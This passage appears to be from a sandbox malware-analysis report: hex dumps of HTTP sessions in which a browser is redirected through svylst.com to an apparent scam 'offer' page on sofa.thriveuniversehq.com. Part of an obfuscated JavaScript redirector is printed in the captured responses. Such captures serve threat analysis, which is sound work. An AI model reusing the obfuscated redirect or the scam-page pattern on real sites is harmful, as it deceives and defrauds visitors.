                                                          2023-11-27 03:23:46 UTC1508INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 63 65 70 2d 76 34 3d 56 4a 79 71 5a 6a 4f 37 49 69 65 30 57 75 33 62 77 49 2d 31 4f 53 6e 46 4c 71 71 59 71 67 37 77 33 6b 62 75 68 41 74 78 4b 37 44 47 4f 4b 4a 71 72 4a 6a 4c 58 5f 36 70 76 39 41 78 73 30 72 79 74 44 4a 56 7a 35 63 49 56 6a 6c 4f 79 52 36 70 54 72 4b 70 58 34 31 34 6d 7a 38 38 39 5f 51 42 2d 42 32 76 30 79 78 33 30 63 35 47 36 39 4d 47 46 53 33 54 68 48 6a 78 53 54 58 47 52 4d 74 49 68 52 4b 55 49 79 73 51 6e 66 58 6c 6e 33 33 6e 50 39 68 51 5f 4f 4e 2d 47 66 35 49 47 50 36 54 66 74 62 4d 31 6d 58 46 6a 78 49 78 4f 72 6a 50 4a 32 66 36 33 70 6b 6c 47 5a 4a 57 77 67 48 5f 67 62 35 33 5f 32 6d 44 41 35 6a 71 5a 4f 31 62 48 6e 38 62 7a 49 75 65 45 44 55 61 43 65 4d 5a 77 6b 2d 46 52 38 4a 62 67 32 34 47
                                                          Data Ascii: Set-Cookie: cep-v4=VJyqZjO7Iie0Wu3bwI-1OSnFLqqYqg7w3kbuhAtxK7DGOKJqrJjLX_6pv9Axs0rytDJVz5cIVjlOyR6pTrKpX414mz889_QB-B2v0yx30c5G69MGFS3ThHjxSTXGRMtIhRKUIysQnfXln33nP9hQ_ON-Gf5IGP6TftbM1mXFjxIxOrjPJ2f63pklGZJWwgH_gb53_2mDA5jqZO1bHn8bzIueEDUaCeMZwk-FR8Jbg24G


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.549723104.21.78.1404434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:46 UTC389OUTGET /favicon.ico HTTP/1.1
                                                          Host: svylst.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: C=848bd2316dc3abc1c9b4aad2b173f936
                                                          2023-11-27 03:23:46 UTC704INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 3b 20 53 65 63 75 72 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4e 72 69 64 3a 20 32 32 36 31 36 35 37 38 35 36 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 33 31 37 34 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:46 GMTContent-Type: text/plain; charset=utf-8; SameSite=None; SecureContent-Length: 0Connection: closeNrid: 2261657856Cache-Control: max-age=14400CF-Cache-Status: HITAge: 3174Last-Modified: Mon


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.5497242.22.76.127443
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:46 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                          Range: bytes=0-2147483646
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: fs.microsoft.com
                                                          2023-11-27 03:23:46 UTC535INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 31 36 20 4d 61 79 20 32 30 31 37 20 32 32 3a 35 38 3a 30 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 30 78 36 34 36 36 37 46 37 30 37 46 46 30 37 44 36 32 42 37 33 33 44 42 43 42 37 39 45 46 45 33 38 35 35 45 36 38 38 36 43 39 39 37 35 42 30 43 30 42 34 36 37 44 34 36 32 33 31 42 33 46 41 35 45 37 22 0d 0a 41 70 69 56 65 72 73 69 6f 6e 3a 20 44 69 73 74 72 69 62 75 74 65 20 31 2e 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 6e 66 69 67
                                                          Data Ascii: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 16 May 2017 22:58:00 GMTETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"ApiVersion: Distribute 1.1Content-Disposition: attachment; filename=config
                                                          2023-11-27 03:23:46 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.549725104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:47 UTC727OUTGET /yufapeso/yeje/sudulexu/rocalibu/zo/index.php HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Referer: http://svylst.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2023-11-27 03:23:48 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 34 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 73 6f 66 61 2e 74 68 72 69 76 65 75 6e 69 76 65 72 73 65 68 71 2e 63 6f 6d 2f 79 75 66 61 70 65 73 6f 2f 79 65 6a 65 2f 73 75 64 75 6c 65 78 75 2f 72 6f 63 61 6c 69 62 75 2f 7a 6f 2f 69 6e 64 65 78 2e 70 68 70 3f 77 6f 78 75 79 61 3d 64 65 6a 75 77 6f 6b 75 6d 65 62 61 6d 65 6d 75 0d 0a
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeLocation: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?woxuya=dejuwokumebamemu
                                                          2023-11-27 03:23:48 UTC650INData Raw: 34 64 31 0d 0a ef bb bf 3c 73 63 72 69 70 74 3e 0d 0a 09 76 61 72 20 5f 30 78 34 35 61 33 3d 5b 27 68 72 65 66 27 2c 27 33 31 30 33 32 36 54 65 6d 61 6d 59 27 2c 27 24 31 2f 2f 24 32 27 2c 27 33 37 38 39 6a 71 4c 41 6a 49 27 2c 27 32 30 31 32 36 30 43 75 66 59 42 52 27 2c 27 69 6e 63 6c 75 64 65 73 27 2c 27 6c 6f 63 61 74 69 6f 6e 27 2c 27 36 32 34 38 35 36 6f 67 64 4d 72 7a 27 2c 27 32 38 70 52 57 68 58 58 27 2c 27 31 30 37 33 34 79 76 74 46 71 7a 27 2c 27 33 35 32 52 75 4d 4d 70 51 27 2c 27 31 33 33 39 50 76 70 52 41 68 27 2c 27 33 39 32 38 36 38 50 63 74 6b 64 59 27 2c 27 69 6e 64 65 78 4f 66 27 2c 27 35 39 36 42 6d 5a 78 76 59 27 5d 3b 76 61 72 20 5f 30 78 35 63 65 37 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 34 62 62 31 37 2c 5f 30 78 33 37 37 31 38
                                                          Data Ascii: 4d1<script>var _0x45a3=['href','310326TemamY','$1//$2','3789jqLAjI','201260CufYBR','includes','location','624856ogdMrz','28pRWhXX','10734yvtFqz','352RuMMpQ','1339PvpRAh','392868PctkdY','indexOf','596BmZxvY'];var _0x5ce7=function(_0x34bb17,_0x37718
                                                          2023-11-27 03:23:48 UTC590INData Raw: 65 36 28 30 78 31 62 38 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 32 65 63 34 65 36 28 30 78 31 63 36 29 29 2a 70 61 72 73 65 49 6e 74 28 5f 30 78 32 65 63 34 65 36 28 30 78 31 62 65 29 29 3b 69 66 28 5f 30 78 65 32 66 39 32 64 3d 3d 3d 5f 30 78 34 61 30 31 34 63 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f 30 78 34 32 37 39 62 65 5b 27 70 75 73 68 27 5d 28 5f 30 78 34 32 37 39 62 65 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 31 32 32 37 63 62 29 7b 5f 30 78 34 32 37 39 62 65 5b 27 70 75 73 68 27 5d 28 5f 30 78 34 32 37 39 62 65 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 5f 30 78 34 35 61 33 2c 30 78 38 37 65 35 65 29 29 3b 76 61 72 20 70 61 72 61 6d 73 3d 27 27 3b 70 61 72 61 6d 73 21 3d 27 27 26 26 28 77 69 6e 64 6f 77 5b
                                                          Data Ascii: e6(0x1b8))+parseInt(_0x2ec4e6(0x1c6))*parseInt(_0x2ec4e6(0x1be));if(_0xe2f92d===_0x4a014c)break;else _0x4279be['push'](_0x4279be['shift']());}catch(_0x1227cb){_0x4279be['push'](_0x4279be['shift']());}}}(_0x45a3,0x87e5e));var params='';params!=''&&(window[
                                                          2023-11-27 03:23:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.549726104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:48 UTC3770OUTGET /yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936 HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2023-11-27 03:23:49 UTC923INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 74 35 63 36 67 64 32 38 30 64 61 65 72 66 6b 70 6c 61 69 68 6c 6d 37 6a 6f 36 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 63 69 64 3d 31 30 32 61 61 36 34 32 39 32 66 63 66 61 66 66 62 62 33 35 37 61 65 35 39 39 65 64 61 30 3b 20 65 78 70 69 72 65 73 3d
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; path=/Set-Cookie: cid=102aa64292fcfaffbb357ae599eda0; expires=
                                                          2023-11-27 03:23:49 UTC446INData Raw: 37 63 31 34 0d 0a ef bb bf 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 70 75 62 6c 69 63 22 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a
                                                          Data Ascii: 7c14<!DOCTYPE html><html lang="en"><head><meta http-equiv="Cache-control" content="public"><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1">
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 2c 37 30 30 2c 37 30 30 69 74 61 6c 69 63 2c 39 30 30 2c 39 30 30 69 74 61 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 22 70 72 69 6e 74 22 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6d 65 64 69 61 3d 27 61 6c 6c 27 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 2d 2d 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 0d 0a
                                                          Data Ascii: ,700,700italic,900,900italic' rel='stylesheet' type='text/css' media="print" onload="this.media='all'"><link href="/assets/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">...<link href="/assets/css/styles.css" rel="stylesheet">--><style>
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 75 65 73 74 69 6f 6e 2e 61 63 74 69 76 65 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 7d 0d 0a 23 6f 66 66 65 72 77 72 61 70 70 65 72 20 68 32 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 0d 0a 7d 0d 0a 23 6f 66 66 65 72 77 72 61 70 70 65 72 20 68 33 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 0d 0a 7d 0d 0a 23 6f 66 66 65 72 77 72 61 70 70 65 72 20 2e 64 64 61 79 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 0d 0a 7d 0d 0a 23 6f 66 66 65 72 77 72 61 70 70 65 72 20 73 70 61 6e 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 0d 0a 7d 0d 0a 23 6f 66 66 65 72 77 72 61 70 70 65 72 20 70 20 7b 0d 0a 20 20 20 20
                                                          Data Ascii: uestion.active { display: block}#offerwrapper h2 { margin-top: 0}#offerwrapper h3 { font-weight: 700}#offerwrapper .dday { margin-bottom: 0}#offerwrapper span.logo img { margin-bottom: 0}#offerwrapper p {
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 74 61 74 65 2d 66 61 72 6d 2d 64 72 61 6b 65 2d 32 30 32 31 2e 6a 70 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 20 66 69 78 65 64 3b 20 0d 0a 20 20 09 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 09 2d 6d 6f 7a 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 09 2d 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 0d 0a 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 23 6f 66 66 65 72 77 72 61 70 70 65 72 20 23 6f 66 66 65 72 73 20 2e 62 6f 78 20 69 6d 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61
                                                          Data Ascii: tate-farm-drake-2021.jpg) no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover; } #offerwrapper #offers .box img { margin: 0 a
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 0d 0a 7d 0d 0a 0d 0a 2e 61 2d 62 75 74 74 6f 6e 20 2e 61 2d 62 75 74 74 6f 6e 2d 69 6e 6e 65 72 20 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 63 66 32 37 32 37 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b
                                                          Data Ascii: der-width: 1px; cursor: pointer; display: inline-block; padding: 0; text-align: center; text-decoration: none!important; vertical-align: middle}.a-button .a-button-inner { background:#cf2727; background: -webk
                                                          2023-11-27 03:23:49 UTC1369INData Raw: 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 64 63 64 66 65 33 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 33 70 78 20 32 70 78 20 72 67 62 61 28 32 32 38 2c 31 32 31 2c 31 37 2c 2e 35 29 0d 0a 7d 0d 0a 0d 0a 0d 0a 2e 61 2d 62 75 74 74 6f 6e 20 2e 61 2d 62 75 74 74 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 7d 0d 0a 0d 0a 2e 61 2d 62 75 74 74 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b
                                                          Data Ascii: background-color: #dcdfe3; background-image: none; box-shadow: 0 0 3px 2px rgba(228,121,17,.5)}.a-button .a-button-text { color: #fff;}.a-button-text { background-color: transparent; border: 0; display: block
